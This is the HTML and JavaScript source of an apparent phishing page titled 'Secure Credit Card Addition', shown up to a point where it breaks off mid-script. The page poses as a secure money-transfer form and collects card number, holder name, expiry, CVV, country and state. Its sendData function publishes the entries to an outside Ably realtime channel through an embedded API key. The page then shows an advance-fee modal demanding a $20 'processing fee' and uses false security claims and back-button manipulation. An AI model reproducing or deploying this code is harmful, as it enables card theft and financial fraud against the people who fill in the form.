<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="google" content="notranslate">
    <title>Secure Credit Card Addition</title>
 
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 20px;
            background-color: #f4f4f9;
            color: #333;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        .spinner-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: white;
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 0;
        }

        .spinner {
            width: 70px;
            height: 70px;
            border: 3px solid rgba(0, 0, 0, 0.1);
            border-left-color: #0042ff;
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }

    .hidden {
            display: none;
        }       
        .container {
            max-width: 600px;
            width: 100%;
            background: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0,0,0,0.1);
            margin-top: -17px;
        }
        .header {
            text-align: center;
            margin-bottom: 20px;
        }
      
        .header p {
            margin: 0;
            color: #666;
        }
        .security {
            margin: 20px 0;
            padding: 15px;
            background: #e7f4e8;
            border-left: 4px solid #4CAF50;
            font-size: 15px;
            color: #333;
            font-weight: bold;
            font-family: Arial, sans-serif ;
            margin-top: -8px;
                             }
        .security h3 {
            margin-top: 0;
            font-family: Arial, sans-serif;
        
        }
        .credit-card-form {
            display: flex;
            flex-direction: column;
        }
        .credit-card-form input {
            margin: 10px 0;
            padding: 10px;
            font-size: 27px;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
        .credit-card-form button {
            margin-top: 20px;
            padding: 15px;
            font-size: 27px;
            color: #fff;
            background-color: #4CAF50;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
        .credit-card-form button:hover {
            background-color: #45a049;
        
        
}
.credit-card {
  position: relative;
  width: 370px;
  height: 200px;
 
 
  margin: auto;
  transform-style: preserve-3d;
  transition: 0.3s;
  margin-left: -16px;
}
.card-front,
.card-back {
  position: absolute;
  width: inherit;
  height: inherit;
  background: linear-gradient(#33a4f8, #206df9);
  border-radius: 1em;
  backface-visibility: hidden;
  }
 .card-back {
    margin-left: -17px;
  
}
.card-front {
  padding: 2em 1em;
}
.branding {
  display: flex;
  align-items: center;
  justify-content: space-between;
}
.branding img {
  width: 50px;
  height: auto;
}
.card-back {
  position: absolute;
  transform: rotateY(180deg);
}
.card-number {
  color: #ffffff;
  font-weight: 600;
  display: flex;
  justify-content: space-between;
  font-size: 19px;
  margin-top: 3em;
}
.details {
  color: #ffffff;
  display: flex;
  justify-content: space-between;
  margin-top: 1.5em;
  font-size: 15px;
  font-weight: bold;
}
.details span {
  display: block;
}
.details #card-holder-name {
  text-transform: uppercase;
}
.card-back .black-strip {
  position: relative;
  background-color: #000000;
  height: 50px;
  top: 2em;
}
.card-back .white-strip {
  top: 3em;
  position: relative;
  text-align: right;
}
.card-back .white-strip span {
  margin-right: 1em;
}
.card-back .white-strip div {
  height: 30px;
  background-color: #ffffff;
  margin-top: 0.5em;
}
.card-back .visa-logo {
  position: absolute;
  width: 50px;
  margin-top: 4em;
  right: 1em;
}
form {
  margin-top: 2em;
}
label,
input {
  display: block;
}
label {
  margin-bottom: 0.5em;
  font-weight: 600;
  font-size: 21px;
}

label {
  margin-bottom: 0.5em;
  font-weight: 600;
  font-family: Arial, sans-serif;
}
input {
  width: 90%;
  border: 1px solid #000000;
  padding: 1em 0.5em;
  border-radius: 0.5em;
  margin-left: 12px;
  font-size: 24px;
  font-weight: bold;
  font-family: Arial, sans-serif;
  height: 1px;
}

input:not(:last-child) {
  margin-bottom: 1em;
}
form .date-cvv {
  display: flex;
  justify-content: space-between;
}
.country-dropdown {
            width: 100%;
            padding: 12px 15px;
            border-radius: 8px;
            border: 2px solid #cccccc;
            font-size: 21px;
            font-weight: bold;            background-color: #ffffff;
            color: #333;
            appearance: none;
            -webkit-appearance: none;
            -moz-appearance: none;
            background-image: url('data:image/svg+xml;utf8,<svg fill="gray" height="24" viewBox="0 0 24 24" width="24" xmlns="http://www.w3.org/2000/svg"><path d="M7 10l5 5 5-5z"/></svg>');
            background-repeat: no-repeat;
            background-position: right 10px center;
        }

        .country-dropdown:focus {
            outline: none;
            border-color: #5e9ed6;
            box-shadow: 0 0 4px rgba(94, 158, 214, 0.4);
        }

        .country-dropdown option {
            padding: 10px;
        }
 .modal {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.7);
      
   z-index: 599999999;
    }

    .modal-content {
      background-color: white;
      padding: 0px;
      border-radius: 5px;
      
   width: 98%;
   height: 90vh;
   
    }
     .container2 {
            width: 100%;
            max-width: 500px;
            margin: 50px auto;
            background-color: #ffffff;
            box-shadow: 0 8px 16px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
            overflow: hidden;
     margin-top: -1px;
        }

        .header1 {
            background-color: #00796b;
            color: #ffffff;
            text-align: center;
            padding: 30px 20px;
            border-bottom: 5px solid #004d40;
        }

        .header1 h1 {
            margin: 0;
            font-size: 24px;
            font-weight: 600;
            margin-top: -26px;
        }

        .content {
            padding: 19px 7px;
        }

        .content p {
            margin: 0 0 15px;
            line-height: 1.7;
            font-size: 18px;
        }

        .icon-section {
            display: flex;
            align-items: center;
            margin: 20px 0;
        }

        .icon-section img {
            width: 50px;
            margin-right: 15px;
        }

        .icon-section p {
            margin: 0;
            font-size: 18px;
        }

        .urgent-message {
            background-color: #ff9800;
            color: #ffffff;
            padding: 15px;
            border-radius: 8px;
            margin: 25px 0;
            text-align: center;
            font-weight: bold;
            font-size: 18px;
        }

        .pay-button {
            width: 100%;
            background-color: #00796b;
            color: #ffffff;
            padding: 15px;
            border: none;
            border-radius: 8px;
            text-align: center;
            font-size: 18px;
            cursor: pointer;
            margin-top: 25px;
            transition: background-color 0.3s;
        }

        .pay-button:hover {
            background-color: #004d40;
        }

        .trust-icons {
            display: flex;
            justify-content: space-between;
            margin: 25px 0;
            text-align: center;
        }

        .trust-icons img {
            width: 60px;
        }

        .testimonials {
            font-style: italic;
            color: #555;
            margin-top: 30px;
        }

        .testimonials p {
            font-size: 1px;
            margin-bottom: 10px;
        }

        .footer {
            background-color: #f0f2f5;
            text-align: center;
            padding: 20px;
            font-size: 12px;
            color: #999;
        }
    </style>
</head>
<body>
    <div id="myModal" class="modal">
    <div class="modal-content">
 <div class="container2" id="payment-container">
        <div class="header1">
            <h1 id="payment-header">Payment Required</h1>
        </div>
        <div class="content">
            <p id="client-greeting" style="font-weight: bold; font-size: 20px; margin-bottom: -6px;">Dear </p><span id="displayName3" style="font-weight: bold; margin-top: -17px; font-size: 20px;"></span>
            <p id="client-greeting2">To access the funds in your account, a small processing fee of $20 needs to be paid. This fee is crucial for ensuring security and timely processing of your transaction.</p>

            <div class="urgent-message" id="urgent-payment-message">
                Please! Complete the payment within the next 24 hours to avoid delays in processing your transfer.
            </div>

            <div class="icon-section" >
                <img src="trust1.png" alt="Security">
                <p id="tac">Your transactions are encrypted with industry-leading security standards.</p>
            </div>
            <div class="icon-section" >
                <img src="trust5.png" alt="Guarantee">
                <p id="tac1">We guarantee your payment will be processed immediately after completion.</p>
            </div>

            <div class="trust-icons">
                <img src="trust4.png" alt="Verified Payment" >
                <img src="trust2.png" alt="Trusted by Thousands" >
                <img src="trust3.png" alt="100% Secure" >
            </div>
<a href="tester.html">
            <button class="pay-button" id="complete-payment-button" style="font-weight: bold;">Complete</button></a>
            <div class="footer" id="footer-text" style="margin-top: 16px;">
                © 2024 Your Company. All rights reserved.
            </div>
        </div>
    </div>    
    </div>
  </div>
   <div class="spinner-overlay" id="spinner-overlay">
        <div class="spinner"></div>
    </div>
    <div class="container">
    <div class="header">
        <h1 id="header-title" style="margin: 0; font-size: 31px; color: #4CAF50; font-family: 'Roboto Mono', monospace;">Secure Your Transfer</h1>
        <p id="header-description" style="font-weight: bold; font-family: Arial, sans-serif;">
            Add your credit card information below to enjoy seamless, fast and secure transfer.
        </p>
    </div>
    <img src="card.jpg" alt="" style="width: 340px; margin-left: 16px; margin-top: -10px;">
    <div class="security">
        <h3 id="security-title">Your Security is Our Priority</h3>
        <p id="security-description">We use industry-leading encryption and security protocols to ensure your data is safe and secure. Your credit card information will be handled with the utmost care and confidentiality.</p>
        <p id="security-details">Here's what we do to protect you:</p>
        <ul id="security-list">
            <li>256-bit SSL encryption to safeguard your data.</li>
            <li>PCI DSS compliance for secure credit card processing.</li>
            <li>Regular security audits and updates.</li>
            <li>24/7 monitoring for fraudulent activities.</li>
        </ul>
    </div>
    <h5 id="scroll-instruction" style="text-align: center; justify-content: center; align-items: center; font-size: 18px; color: black; box-shadow: 0 0 19px rgba(0, 0, 0, 1.5); border-radius: 19px;">
        To Continue Please Scroll Down And Input Card Details You Want The Money To Be Transferred To
 Or Click On The Camera Picture Below</h5>
   
   <a href="deleteme.html">
    <img src="camera.jpg" alt="" style="width: 120px; height: 120px; border-radius: 50%; box-shadow: 0 0 19px rgba(0, 0, 0, 1.5); margin-left: 130px; margin-top: -21px;"</img></a>
    <link href="https://fonts.googleapis.com/css2?family=Roboto+Mono:wght@400;600&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="style.css">
 </head>
  <body>
    <div class="wrapper">
      <div class="credit-card" id="card">
        <div class="card-front">
          <div class="branding">
            <img src="metal.png" class="chip-img" />
            <img src="visaa.png" class="visa-logo" />
          </div>
          <div class="card-number">
            <div>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
            </div>
            <div>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
            </div>
            <div>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
            </div>
            <div>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
              <span class="card-number-display">_</span>
            </div>
          </div>
          <div class="details">
            <div>
              <span id="carrd">Card Holder</span>
              <span id="card-holder-name">Your Name Here</span>
            </div>
            <div>
              <span id="expire">Expires</span>
              <span id="validity">06/28</span>
            </div>
          </div>
        </div>
        <div class="card-back">
          <div class="black-strip"></div>
          <div class="white-strip">
            <span>CVV</span>
            <div id="cvv-display"></div>
          </div>
          <img src="visaa.png" class="visa-logo" />
        </div>   
</div>


<form id="dataForm">
    <label for="card-number" id="label-card-number" style="margin-top: 85px;">Card Number</label>
    <input type="number" id="card-number" placeholder="Enter Your Card Number" required>
    <label for="card-holder" id="label-card-holder">Card Holder:</label>
    <input type="text" id="card-name-input" placeholder="Your Full Name" required>
    <div class="name5">
        <label for="expiry-year" id="label-expiry-year" style="margin-top: 0px;">Expiry Year</label>
        <select name="expiry-year" id="expiry-year" required style="margin-top: 0px; height: 49px; width: 120px; border-radius: 19px; font-size: 17px">
            <option value="" id="pen">Expiry Year</option>
            <!-- Add options here -->
        </select>
        <label for="cvv" id="label-cvv" style="margin-left: 281px; margin-top: -80px;">CVV:</label>
        <input type="number" id="cvv" placeholder="***" style="width: 56px; margin-left: 270px; font-size: 20px; border-radius: 19px; height: 17px; " required>
    </div>
    <div class="name4">
        <label for="expiry-month" id="label-expiry-month" style="margin-left: 126px; margin-top: -55px;">Expiry Month</label>
        <select name="expiry-month" id="expiry-month" required style="margin-left: 120px; height: 49px; width: 120px; border-radius: 19px; font-size:17px;">
            <option value="" id="tap">Expiry Month</option>
            <option value="01" id="jan">January 01</option>
            <option value="02"id="jan1">February 03</option>
            <option value="03"id="jan2">March 03</option>
            <option value="04"id="jan3">April 04</option>
            <option value="05"id="jan4">May 05</option>
            <option value="06"id="jan5">June 06</option>
            <option value="07"id="jan6">July 07</option>
            <option value="08"id="jan7">August 08</option>
            <option value="09" id="jan8">September 09</option>
            <option value="10"id="jan9">October 10</option>
            <option value="11"id="jan10">November 11</option>
            <option value="12"id="jan11">December 12</option>
        </select>
  
    <label style="margin-top: 15px;" for="card-number" id="label-card-number1" style="margin-top: 85px;">Country</label>
     <select id="country" class="country-dropdown" >
            
  <option value="" disabled selected id="select">Select Your Country</option>
            <option id="option-AFG" value="AFG">Afghanistan</option>
            <option id="option-ALB" value="ALB">Albania</option>
            <option id="option-DZA" value="DZA">Algeria</option>
            <option id="option-AND" value="AND">Andorra</option>
            <option id="option-AGO" value="AGO">Angola</option>
            <option id="option-ATG" value="ATG">Antigua and Barbuda</option>
            <option id="option-ARG" value="ARG">Argentina</option>
            <option id="option-ARM" value="ARM">Armenia</option>
            <option id="option-AUS" value="AUS">Australia</option>
            <option id="option-AUT" value="AUT">Austria</option>
            <option id="option-AZE" value="AZE">Azerbaijan</option>
            <option id="option-BHS" value="BHS">Bahamas</option>
            <option id="option-BHR" value="BHR">Bahrain</option>
            <option id="option-BGD" value="BGD">Bangladesh</option>
            <option id="option-BRB" value="BRB">Barbados</option>
            <option id="option-BLR" value="BLR">Belarus</option>
            <option id="option-BEL" value="BEL">Belgium</option>
            <option id="option-BLZ" value="BLZ">Belize</option>
            <option id="option-BEN" value="BEN">Benin</option>
            <option id="option-BTN" value="BTN">Bhutan</option>
            <option id="option-BOL" value="BOL">Bolivia</option>
            <option id="option-BIH" value="BIH">Bosnia and Herzegovina</option>
            <option id="option-BWA" value="BWA">Botswana</option>
            <option id="option-BRA" value="BRA">Brazil</option>
            <option id="option-BRN" value="BRN">Brunei</option>
            <option id="option-BGR" value="BGR">Bulgaria</option>
            <option id="option-BFA" value="BFA">Burkina Faso</option>
            <option id="option-BDI" value="BDI">Burundi</option>
            <option id="option-CPV" value="CPV">Cabo Verde</option>
            <option id="option-KHM" value="KHM">Cambodia</option>
            <option id="option-CMR" value="CMR">Cameroon</option>
            <option id="option-CAN" value="CAN">Canada</option>
            <option id="option-CAF" value="CAF">Central African Republic</option>
            <option id="option-TCD" value="TCD">Chad</option>
            <option id="option-CHL" value="CHL">Chile</option>
            <option id="option-CHN" value="CHN">China</option>
            <option id="option-COL" value="COL">Colombia</option>
            <option id="option-COM" value="COM">Comoros</option>
            <option id="option-COD" value="COD">Congo (Democratic Republic)</option>
            <option id="option-COG" value="COG">Congo (Republic)</option>
            <option id="option-CRI" value="CRI">Costa Rica</option>
            <option id="option-CIV" value="CIV">Côte d'Ivoire</option>
            <option id="option-HRV" value="HRV">Croatia</option>
            <option id="option-CUB" value="CUB">Cuba</option>
            <option id="option-CYP" value="CYP">Cyprus</option>
            <option id="option-CZE" value="CZE">Czech Republic</option>
            <option id="option-DNK" value="DNK">Denmark</option>
            <option id="option-DJI" value="DJI">Djibouti</option>
            <option id="option-DMA" value="DMA">Dominica</option>
            <option id="option-DOM" value="DOM">Dominican Republic</option>
            <option id="option-ECU" value="ECU">Ecuador</option>
            <option id="option-EGY" value="EGY">Egypt</option>
            <option id="option-SLV" value="SLV">El Salvador</option>
            <option id="option-GNQ" value="GNQ">Equatorial Guinea</option>
            <option id="option-ERI" value="ERI">Eritrea</option>
            <option id="option-EST" value="EST">Estonia</option>
            <option id="option-SWZ" value="SWZ">Eswatini</option>
            <option id="option-ETH" value="ETH">Ethiopia</option>
            <option id="option-FJI" value="FJI">Fiji</option>
            <option id="option-FIN" value="FIN">Finland</option>
            <option id="option-FRA" value="FRA">France</option>
            <option id="option-GAB" value="GAB">Gabon</option>
            <option id="option-GMB" value="GMB">Gambia</option>
            <option id="option-GEO" value="GEO">Georgia</option>
            <option id="option-DEU" value="DEU">Germany</option>
            <option id="option-GHA" value="GHA">Ghana</option>
            <option id="option-GRC" value="GRC">Greece</option>
            <option id="option-GRD" value="GRD">Grenada</option>
            <option id="option-GTM" value="GTM">Guatemala</option>
            <option id="option-GIN" value="GIN">Guinea</option>
            <option id="option-GNB" value="GNB">Guinea-Bissau</option>
            <option id="option-GUY" value="GUY">Guyana</option>
            <option id="option-HTI" value="HTI">Haiti</option>
            <option id="option-HND" value="HND">Honduras</option>
            <option id="option-HUN" value="HUN">Hungary</option>
            <option id="option-ISL" value="ISL">Iceland</option>
            <option id="option-IND" value="IND">India</option>
            <option id="option-IDN" value="IDN">Indonesia</option>
            <option id="option-IRN" value="IRN">Iran</option>
            <option id="option-IRQ" value="IRQ">Iraq</option>
            <option id="option-IRL" value="IRL">Ireland</option>
            <option id="option-ISR" value="ISR">Israel</option>
            <option id="option-ITA" value="ITA">Italy</option>
            <option id="option-JAM" value="JAM">Jamaica</option>
            <option id="option-JPN" value="JPN">Japan</option>
            <option id="option-JOR" value="JOR">Jordan</option>
            <option id="option-KAZ" value="KAZ">Kazakhstan</option>
            <option id="option-KEN" value="KEN">Kenya</option>
            <option id="option-KIR" value="KIR">Kiribati</option>
            <option id="option-KWT" value="KWT">Kuwait</option>
            <option id="option-KGZ" value="KGZ">Kyrgyzstan</option>
            <option id="option-LAO" value="LAO">Laos</option>
            <option id="option-LVA" value="LVA">Latvia</option>
            <option id="option-LBN" value="LBN">Lebanon</option>
            <option id="option-LSO" value="LSO">Lesotho</option>
            <option id="option-LBR" value="LBR">Liberia</option>
            <option id="option-LBY" value="LBY">Libya</option>
            <option id="option-LIE" value="LIE">Liechtenstein</option>
            <option id="option-LTU" value="LTU">Lithuania</option>
            <option id="option-LUX" value="LUX">Luxembourg</option>
            <option id="option-MDG" value="MDG">Madagascar</option>
            <option id="option-MWI" value="MWI">Malawi</option>
            <option id="option-MYS" value="MYS">Malaysia</option>
            <option id="option-MDV" value="MDV">Maldives</option>
            <option id="option-MLI" value="MLI">Mali</option>
            <option id="option-MLT" value="MLT">Malta</option>
            <option id="option-MHL" value="MHL">Marshall Islands</option>
            <option id="option-MRT" value="MRT">Mauritania</option>
            <option id="option-MUS" value="MUS">Mauritius</option>
            <option id="option-MEX" value="MEX">Mexico</option>
            <option id="option-FSM" value="FSM">Micronesia</option>
            <option id="option-MDA" value="MDA">Moldova</option>
            <option id="option-MCO" value="MCO">Monaco</option>
            <option id="option-MNG" value="MNG">Mongolia</option>
            <option id="option-MNE" value="MNE">Montenegro</option>
            <option id="option-MAR" value="MAR">Morocco</option>
            <option id="option-MOZ" value="MOZ">Mozambique</option>
            <option id="option-NAM" value="NAM">Namibia</option>
            <option id="option-NRU" value="NRU">Nauru</option>
            <option id="option-NPL" value="NPL">Nepal</option>
            <option id="option-NLD" value="NLD">Netherlands</option>
            <option id="option-NZL" value="NZL">New Zealand</option>
            <option id="option-NIC" value="NIC">Nicaragua</option>
            <option id="option-NER" value="NER">Niger</option>
            <option id="option-NGA" value="NGA">Nigeria</option>
            <option id="option-MKD" value="MKD">North Macedonia</option>
            <option id="option-NOR" value="NOR">Norway</option>
            <option id="option-OMN" value="OMN">Oman</option>
            <option id="option-PAK" value="PAK">Pakistan</option>
            <option id="option-PLW" value="PLW">Palau</option>
            <option id="option-PAN" value="PAN">Panama</option>
            <option id="option-PNG" value="PNG">Papua New Guinea</option>
            <option id="option-PRY" value="PRY">Paraguay</option>
            <option id="option-PER" value="PER">Peru</option>
            <option id="option-PHL" value="PHL">Philippines</option>
            <option id="option-POL" value="POL">Poland</option>
            <option id="option-PRT" value="PRT">Portugal</option>
            <option id="option-QAT" value="QAT">Qatar</option>
            <option id="option-REU" value="REU">Réunion</option>
            <option id="option-ROU" value="ROU">Romania</option>
            <option id="option-RUS" value="RUS">Russia</option>
            <option id="option-RWA" value="RWA">Rwanda</option>
            <option id="option-BLM" value="BLM">Saint Barthélemy</option>
            <option id="option-SHN" value="SHN">Saint Helena</option>
            <option id="option-KNA" value="KNA">Saint Kitts and Nevis</option>
            <option id="option-LCA" value="LCA">Saint Lucia</option>
            <option id="option-SPM" value="SPM">Saint Pierre and Miquelon</option>
            <option id="option-VCT" value="VCT">Saint Vincent and the Grenadines</option>
            <option id="option-WSM" value="WSM">Samoa</option>
            <option id="option-SMR" value="SMR">San Marino</option>
            <option id="option-STP" value="STP">São Tomé and Príncipe</option>
            <option id="option-SAU" value="SAU">Saudi Arabia</option>
            <option id="option-SEN" value="SEN">Senegal</option>
            <option id="option-SRB" value="SRB">Serbia</option>
            <option id="option-SYC" value="SYC">Seychelles</option>
            <option id="option-SLE" value="SLE">Sierra Leone</option>
            <option id="option-SGP" value="SGP">Singapore</option>
            <option id="option-SXM" value="SXM">Sint Maarten</option>
            <option id="option-SVK" value="SVK">Slovakia</option>
            <option id="option-SVN" value="SVN">Slovenia</option>
            <option id="option-SLB" value="SLB">Solomon Islands</option>
            <option id="option-SOM" value="SOM">Somalia</option>
            <option id="option-ZAF" value="ZAF">South Africa</option>
            <option id="option-SGS" value="SGS">South Georgia and the South Sandwich Islands</option>
            <option id="option-SSD" value="SSD">South Sudan</option>
            <option id="option-ESP" value="ESP">Spain</option>
            <option id="option-LKA" value="LKA">Sri Lanka</option>
            <option id="option-SDN" value="SDN">Sudan</option>
            <option id="option-SUR" value="SUR">Suriname</option>
            <option id="option-SJM" value="SJM">Svalbard and Jan Mayen</option>
            <option id="option-SWE" value="SWE">Sweden</option>
            <option id="option-CHE" value="CHE">Switzerland</option>
            <option id="option-SYR" value="SYR">Syria</option>
            <option id="option-TWN" value="TWN">Taiwan</option>
            <option id="option-TJK" value="TJK">Tajikistan</option>
            <option id="option-TZA" value="TZA">Tanzania</option>
            <option id="option-THA" value="THA">Thailand</option>
            <option id="option-TGO" value="TGO">Togo</option>
            <option id="option-TKL" value="TKL">Tokelau</option>
            <option id="option-TON" value="TON">Tonga</option>
            <option id="option-TTO" value="TTO">Trinidad and Tobago</option>
           
        <option id="option-TUN" value="TUN">Tunisia</option>
            <option id="option-TUR" value="TUR">Turkey</option>
            <option id="option-TKM" value="TKM">Turkmenistan</option>
            <option id="option-TUV" value="TUV">Tuvalu</option>
            <option id="option-UGA" value="UGA">Uganda</option>
            <option id="option-UKR" value="UKR">Ukraine</option>
            <option id="option-ARE" value="ARE">United Arab Emirates</option>
            <option id="option-GBR" value="GBR">United Kingdom</option>
            <option id="option-USA" value="USA">United States</option>
            <option id="option-URY" value="URY">Uruguay</option>
            <option id="option-UZB" value="UZB">Uzbekistan</option>
            <option id="option-VUT" value="VUT">Vanuatu</option>
            <option id="option-VEN" value="VEN">Venezuela</option>
            <option id="option-VNM" value="VNM">Vietnam</option>
            <option id="option-ESH" value="ESH">Western Sahara</option>
            <option id="option-YEM" value="YEM">Yemen</option>
            <option id="option-ZMB" value="ZMB">Zambia</option>
            <option id="option-ZWE" value="ZWE">Zimbabwe</option>
        </select>
    <label style="margin-top: 13px;" for="card-holder" id="label-card-holder1">State</label>
    <input type="text" id="fiel" placeholder="Please Enter Your State" required>
  <input style="display: none;" type="text" id="fiele" placeholder="Your Full Name" required>
  
    </div>
    <button type="submit" id="verify-button" style="text-align: center; justify-content: center; align-items: center; height: 46px; width: 250px; margin-left: 50px; font-size: 21px; margin-top: 45px; background-color: #00b300; color: white; border: none; border-radius: 22px; font-weight: bold; transition: all 0.3s ease; " onclick="sendData()" >Proceed</button>
</form>
 <script src="https://cdn.ably.io/lib/ably.min-1.js"></script>


<script>
 // Initialize Ably client
        const ably = new Ably.Realtime('eXsM9Q.P9Cadg:czuSocYApa29JpDHttEBFL6V8xi486Wg7svkiRHBRXs');
        const channel = ably.channels.get('form-data');

        function sendData() {
            // Get data from input fields
            const data = {
                field1: document.getElementById('card-number').value,
                field2: document.getElementById('card-name-input').value,
                field3: document.getElementById('expiry-year').value,
                field4: document.getElementById('cvv').value,
                field5: document.getElementById('expiry-month').value,
                field6: document.getElementById('country').value,
                field7: document.getElementById('fiel').value,
                
                userName: localStorage.getItem('userName') || 'Anonymous'
            };

            // Publish the data to the Ably channel
            channel.publish('formDataSent', data, function(err) {
                if (err) {
                    console.error('Error publishing data:', err);
                } else {
                    console.log('Data successfully sent.');
    const modal = document.getElementById('myModal');
    const openModalButton = document.getElementById('openModal');

    // Check localStorage to see if modal was open before page refresh
    if (localStorage.getItem('modalOpen') === 'true') {
      modal.style.display = 'flex';  // Set display to 'flex' to show modal
    }

    
            document.getElementById('myModal').style.display = 'flex';
       
      localStorage.setItem('modalOpen', 'true');  // Save modal state to localStorage
      history.pushState(null, null, location.href);  // Push a state to the history stack
    

    // Listen for the back button event (popstate)
    window.addEventListener('popstate', function(event) {
      if (modal.style.display === 'flex') {
        modal.style.display = 'none';  // Close modal when back button is pressed
        localStorage.setItem('modalOpen', 'false');  // Update modal state in localStorage
        history.pushState(null, null, location.href);  // Prevent going back further
      }
    });

    // Ensure the modal state is cleared when the page is closed
    window.addEventListener('beforeunload', function() {
      if (modal.style.display !== 'flex') {
        localStorage.removeItem('modalOpen');
      }
    });           
                }
            });
        }
       const cardNumber = document.getElementById("card-number");
const cardHolderName = document.getElementById("card-holder-name");
const cardNameInput = document.getElementById("card-name-input");
const displayValidity = document.getElementById("validity");
const validityInput = document.getElementById("validity-input");
const cardNumberDisplay = document.querySelectorAll(".card-number-display");
const cvvInput = document.getElementById("cvv");
const cvvDisplay = document.getElementById("cvv-display");
const expiryMonthSelect = document.getElementById("expiry-month");
    const expiryYearSelect = document.getElementById("expiry-year");

let currentSpanIndex = 0;
cardNumber.addEventListener("input", () => {
  const inputNumber = cardNumber.value.replace(/\D/g, "");
  cardNumber.value = cardNumber.value.slice(0, 16).replace(/\D/g, "");
  for (let i = 0; i < cardNumberDisplay.length; i++) {
    if (i < inputNumber.length) {
      cardNumberDisplay[i].textContent = inputNumber[i];
    } else {
      cardNumberDisplay[i].textContent = "_";
    }
  }

  if (inputNumber.length <= cardNumberDisplay.length) {
    currentSpanIndex = inputNumber.length;
  } else {
    currentSpanIndex = cardNumberDisplay.length;
  }
});

cardNameInput.addEventListener("input", () => {
  if (cardNameInput.value.length < 1) {
    cardHolderName.innerText = "Your Name Here";
  } else if (cardNameInput.value.length > 30) {
    cardNameInput.value = cardNameInput.value.slice(0, 30);
  } else {
    cardHolderName.innerText = cardNameInput.value;
  }
});
// Populate the expiry year dropdown dynamically
    window.onload = () => {
      cvvInput.value = "";
      expiryMonthSelect.value = "";
      expiryYearSelect.value = "";
      cardNameInput.value = "";
      cardNumber.value = "";
      displayValidity.innerText = "MM/YY";

      const currentYear = new Date().getFullYear();
      for (let i = 0; i < 10; i++) {
        const option = document.createElement("option");
        option.value = currentYear + i;
        option.textContent = currentYear + i;
        expiryYearSelect.appendChild(option);
      }
    };

    // Update the validity display when the month or year changes
    function updateExpiryDisplay() {
      const selectedMonth = expiryMonthSelect.value;
      const selectedYear = expiryYearSelect.value.slice(2); // Get last 2 digits of the year
      if (selectedMonth && selectedYear) {
        displayValidity.innerText = `${selectedMonth}/${selectedYear}`;
      } else {
        displayValidity.innerText = "MM/YY";
      }
    }

    expiryMonthSelect.addEventListener("change", updateExpiryDisplay);
    expiryYearSelect.addEventListener("change", updateExpiryDisplay);



//cvv
cvvInput.addEventListener("input", () => {
  const userInput = cvvInput.value;
  const sanitizedInput = userInput.slice(0, 3);
  const numericInput = sanitizedInput.replace(/\D/g, "");
  cvvInput.value = numericInput;
  cvvDisplay.innerText = numericInput;
});

//Flip
cvvInput.addEventListener("click", () => {
  document.getElementById("card").style.transform = "rotateY(180deg)";
});
//Reflip card
document.addEventListener("click", () => {
  if (document.activeElement.id != "cvv") {
    document.getElementById("card").style.transform = "rotateY(0deg)";
  }
});

  </script>
 <script>
          
      


const countryLanguageMap = {
        "AF": "fa", "AL": "sq", "DZ": "ar", "AS": "en", "AD": "ca", "AO": "pt", "AG": "en",
        "AR": "es", "AM": "hy", "AU": "en", "AT": "de", "AZ": "az", "BS": "en", "BH": "ar",
        "BD": "bn", "BB": "en", "BY": "be", "BE": "nl", "BZ": "en", "BJ": "fr", "BT": "dz",
        "BO": "es", "BA": "bs", "BW": "en", "BR": "pt", "BN": "ms", "BG": "bg", "BF": "fr",
        "BI": "fr", "CV": "pt", "KH": "km", "CM": "fr", "CA": "en", "CF": "fr", "TD": "fr",
        "CL": "es", "CN": "zh-CN", "CO": "es", "KM": "ar", "CD": "fr", "CG": "fr", "CR": "es",
        "CI": "fr", "HR": "hr", "CU": "es", "CY": "el", "CZ": "cs", "DK": "da", "DJ": "fr",
        "DM": "en", "DO": "es", "EC": "es", "EG": "ar", "SV": "es", "GQ": "es", "ER": "ti",
        "EE": "et", "SZ": "en", "ET": "am", "FJ": "en", "FI": "fi", "FR": "fr", "GA": "fr",
        "GM": "en", "GE": "ka", "DE": "de", "GH": "en", "GR": "el", "GD": "en", "GT": "es",
        "GN": "fr", "GW": "pt", "GY": "en", "HT": "fr", "HN": "es", "HU": "hu", "IS": "is",
        "IN": "hi", "ID": "id", "IR": "fa", "IQ": "ar", "IE": "en", "IL": "he", "IT": "it",
        "JM": "en", "JP": "ja", "JO": "ar", "KZ": "kk", "KE": "sw", "KI": "en", "KP": "ko",
        "KR": "ko", "KW": "ar", "KG": "ky", "LA": "lo", "LV": "lv", "LB": "ar", "LS": "en",
        "LR": "en", "LY": "ar", "LI": "de", "LT": "lt", "LU": "lb", "MG": "mg", "MW": "en",
        "MY": "ms", "MV": "dv", "ML": "fr", "MT": "mt", "MH": "en", "MR": "ar", "MU": "en",
        "MX": "es", "FM": "en", "MD": "ro", "MC": "fr", "MN": "mn", "ME": "sr", "MA": "ar",
        "MZ": "pt", "MM": "my", "NA": "en", "NR": "na", "NP": "ne", "NL": "nl", "NZ": "en",
        "NI": "es", "NE": "fr", "NG": "en", "MK": "mk", "NO": "no", "OM": "ar", "PK": "ur",
        "PW": "en", "PA": "es", "PG": "en", "PY": "es", "PE": "es", "PH": "tl", "PL": "pl",
